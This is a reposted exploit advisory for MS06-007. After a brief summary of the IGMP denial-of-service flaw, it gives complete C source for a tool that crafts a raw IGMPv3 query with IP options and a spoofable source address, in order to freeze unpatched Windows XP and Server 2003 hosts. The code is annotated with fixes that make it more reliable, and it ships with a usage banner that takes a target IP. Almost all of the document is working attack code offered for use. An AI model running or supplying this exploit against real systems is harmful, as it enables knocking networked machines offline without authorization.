IGMP v3 DoS (MS06-007, Exploit)
来源:http://www.milw0rm.com/exploits/1599 作者:Alexey 发布时间:2006-03-23  

IGMP v3 DoS (MS06-007, Exploit)

Summary
The Internet Group Management Protocol (IGMP) is a communications protocol used to manage membership of IP multicast groups. IP hosts and adjacent multicast routers use it to establish and maintain group memberships. It is an integral part of the IP multicast specification, playing a role for multicast comparable to that of ICMP for unicast traffic.

A specially crafted IGMP packet sent to a vulnerable system can cause a denial of service: the affected system stops responding.

Credit:
The original article can be found at:
http://www.milw0rm.com/exploits/1599
Related articles:
TCP/IP IGMP DoS (MS06-007)
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

Details
/*
IGMP v3 DoS Exploit

ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

by Alexey Sintsov (dookie@inbox.ru)

Requirements:
Administrator rights on the sending host (the exploit opens a raw socket with IP_HDRINCL)
Windows Firewall turned off on the sending host (needed for the raw packet to go out)

Affected Products:
Microsoft Corporation Windows XP All
Microsoft Corporation Windows Server 2003 All
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

/*
 * IPv4 header as laid out on the wire, 24 bytes: the 20-byte fixed part
 * followed by one 4-byte option word (options[2]), so IHL is 6.
 * Multi-byte fields are written in network byte order by sendIGMP().
 * Every member sits at its natural alignment, so no packing pragma is
 * needed; the address fields are unsigned int (4 bytes on the supported
 * compilers).
 */
typedef struct iphdr
{
unsigned char verlen; // IP version (high nibble) | header length in 32-bit words
unsigned char tos; // Type of service
unsigned short total_len; // Total length of the packet (header + payload)
unsigned short ident; // Identification
unsigned short frag_and_flags; // Flags + fragment offset
unsigned char ttl; // Time to live
unsigned char proto; // Payload protocol (IPPROTO_IGMP here)
unsigned short checksum; // IP header checksum
unsigned int sourceIP; // Source IP
unsigned int destIP; // Destination IP
unsigned short options[2]; // One 4-byte option word; sendIGMP() zero-fills it

} IPHEADER;

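/*
 * IGMPv3 Membership Query layout, 16 bytes, as sent by sendIGMP():
 * 8-byte fixed part, then Resv/S/QRV, QQIC, a 16-bit source count and
 * exactly one source address.
 *
 * The 32-bit fields are `unsigned int`, not `unsigned long`: the latter is
 * 8 bytes on LP64 compilers, which would pad the struct to 24 bytes and
 * break both the checksum length and the wire layout. `unsigned int` also
 * matches sourceIP/destIP in IPHEADER.
 */
typedef struct igmphdr {
unsigned char type;      /* 0x11 = Membership Query */
unsigned char code;      /* Max Resp Code */
unsigned short checksum; /* ones'-complement checksum over all 16 bytes */
unsigned int group;      /* group address (sendIGMP() uses 0.0.0.0) */
unsigned char ResvSQVR;  /* Resv(4) | S(1) | QRV(3) */
unsigned char QQIC;      /* Querier's Query Interval Code */
unsigned short num;      /* number of source addresses that follow (1) */
unsigned int addes;      /* the single source address */

} IGMPHEADER;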

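/*
 * Internet (RFC 1071 style) ones'-complement checksum over `size` bytes.
 *
 * buffer: start of the data, read as 16-bit words in host byte order.
 * size:   number of bytes. A trailing odd byte is folded in as a single
 *         octet (correct for the little-endian word layout used above).
 *         A NULL buffer or size <= 0 is treated as "no data" and yields
 *         0xFFFF; the original read one byte past the caller's data for
 *         a negative size.
 *
 * Returns the 16-bit ones'-complement of the folded sum. Since the words
 * are summed in host order, the value is already laid out correctly when
 * assigned straight into a packet header; it must not be byte-swapped.
 *
 * The parameter types are spelled out as `unsigned short`/`unsigned char`,
 * which is what the Windows USHORT/UCHAR aliases expand to, so the routine
 * no longer depends on those platform typedefs.
 */
unsigned short checksum(const unsigned short *buffer, int size)
{
unsigned long sum = 0;

if (buffer == NULL || size <= 0)
return 0xFFFF;

/* Sum whole 16-bit words. */
while (size > 1) {
sum += *buffer++;
size -= (int)sizeof(unsigned short);
}

/* Odd trailing byte contributes as the low byte of a zero-padded word. */
if (size)
sum += *(const unsigned char *)buffer;

/* Fold carries back into 16 bits; the first fold may itself carry. */
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);

return (unsigned short)(~sum);
}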

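#ifndef IP_HDRINCL
#define IP_HDRINCL 2 /* IPPROTO_IP option: the application supplies the IP header */
#endif
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffffUL
#endif

/*
 * Build one IGMPv3 Membership Query (type 0x11) inside an IPv4 header that
 * carries four zero option bytes (IHL = 6 instead of 5) and send it from
 * `a` to `b` over a raw socket.
 *
 * a: dotted-quad source address stamped into the IP header (spoofable).
 * b: dotted-quad destination address; also listed as the query's single
 *    source address (num = 1).
 *
 * Returns 1 when sendto() accepted the datagram, 0 on any failure: missing
 * or unparsable address, WSAStartup, socket creation, setsockopt or send.
 * Each failure prints a short diagnostic, as the original did.
 *
 * Requires administrator rights (raw socket with IP_HDRINCL). Exactly one
 * datagram is sent; per MS06-007 an unpatched target stops responding, so
 * aim it only at systems you are authorized to test.
 *
 * Fixes relative to the original:
 *  - NULL arguments and inet_addr() failures (INADDR_NONE) are rejected
 *    instead of crashing or emitting 255.255.255.255 in the header;
 *  - IHL is header bytes / 4, not / sizeof(unsigned long), which is 8 on
 *    LP64 compilers and would have produced IHL = 3;
 *  - the IP checksum is computed over the IP header (fixed part + options)
 *    and stored without ntohs(). A ones'-complement sum of host-order
 *    words is already correct in memory; byte-swapping it, as the original
 *    did, yields a wrong checksum. NOTE(review): some stacks recompute the
 *    checksum on IP_HDRINCL sockets, which may be why it worked anyway;
 *  - a single cleanup path closes the socket and calls WSACleanup().
 */
int sendIGMP(char* a, char* b)
{
IPHEADER ipHeader;
IGMPHEADER igmpHeader;
char szSendBuf[60] = {0};
const int pktLen = (int)(sizeof(ipHeader) + sizeof(igmpHeader));
unsigned int dst_addr, src_addr;
WSADATA WSAData;
SOCKET sock = INVALID_SOCKET;
SOCKADDR_IN ssin;
BOOL flag = TRUE;
int result = 0;

if (a == NULL || b == NULL) {
printf("Missing address\n");
return 0;
}
dst_addr = inet_addr(b);
src_addr = inet_addr(a);
if (dst_addr == INADDR_NONE || src_addr == INADDR_NONE) {
printf("Invalid IPv4 address\n");
return 0;
}

if (WSAStartup(MAKEWORD(2, 2), &WSAData) != 0)
return 0;

/* Flag 0x01 is WSA_FLAG_OVERLAPPED, kept from the original. */
sock = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, 0x01);
if (sock == INVALID_SOCKET) {
printf("Create socket error");
goto cleanup;
}

/* We build the IP header ourselves. */
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
printf("Set options error");
goto cleanup;
}

memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = htons(99); /* no meaning for a raw IP socket; kept as-is */
ssin.sin_addr.s_addr = dst_addr;

/* IPv4 header: version 4, IHL in 32-bit words (24 bytes -> 6). */
memset(&ipHeader, 0, sizeof(ipHeader));
ipHeader.verlen = (unsigned char)((4 << 4) | (sizeof(ipHeader) / 4));
ipHeader.tos = 0;
ipHeader.total_len = htons((unsigned short)pktLen);
ipHeader.ident = htons(0);
ipHeader.frag_and_flags = 0;
ipHeader.ttl = 128;
ipHeader.proto = IPPROTO_IGMP;
ipHeader.checksum = 0;
ipHeader.sourceIP = src_addr;
ipHeader.destIP = dst_addr;
/* Four zero option bytes. Their presence (IHL > 5) on an IGMPv3 query is
   the trigger the original marked with "bug is here". */
ipHeader.options[0] = htons(0x0000);
ipHeader.options[1] = htons(0x0000);

/* IGMPv3 Membership Query listing one source address. */
memset(&igmpHeader, 0, sizeof(igmpHeader));
igmpHeader.type = 0x11;
igmpHeader.code = 5;
igmpHeader.checksum = 0;
igmpHeader.group = inet_addr("0.0.0.0");
igmpHeader.ResvSQVR = 0x0;
igmpHeader.QQIC = 0;
igmpHeader.num = htons(1);
igmpHeader.addes = dst_addr;

/* IGMP checksum over the 16-byte query, then place the final copy. */
memcpy(szSendBuf + sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
igmpHeader.checksum = checksum((unsigned short *)(szSendBuf + sizeof(ipHeader)), (int)sizeof(igmpHeader));
memcpy(szSendBuf + sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));

/* IP checksum over the 24-byte header only (checksum field still zero). */
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
ipHeader.checksum = checksum((unsigned short *)szSendBuf, (int)sizeof(ipHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

if (sendto(sock, szSendBuf, pktLen, 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
printf("Send error: <%d>\n", WSAGetLastError());
goto cleanup;
}
result = 1;

cleanup:
if (sock != INVALID_SOCKET)
closesocket(sock);
WSACleanup();
return result;
}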

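/*
 * Entry point: igmps.exe <target ip> <source ip>
 *
 * argv[1] is the destination of the crafted packet and argv[2] the source
 * address stamped into it; sendIGMP() takes (source, target), hence the
 * swapped order in the call below.
 *
 * The original checked argc < 2, so a single argument passed argv[2]
 * (NULL) into inet_addr(). Both arguments are now required, and the exit
 * status reports failure: 0 on success, 1 on usage error or when the
 * packet was not sent. The return type is spelled out; implicit int is
 * not valid C99+.
 */
int main(int argc, char **argv)
{
if (argc < 3) {
printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
printf("Usage:\n");
printf("c:\\igmps.exe <target ip> <source ip>\n\n");
return 1;
}

/* sendIGMP(source, target) */
if (!sendIGMP(argv[2], argv[1])) {
printf("Packet not sent\n");
return 1;
}
return 0;
}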




 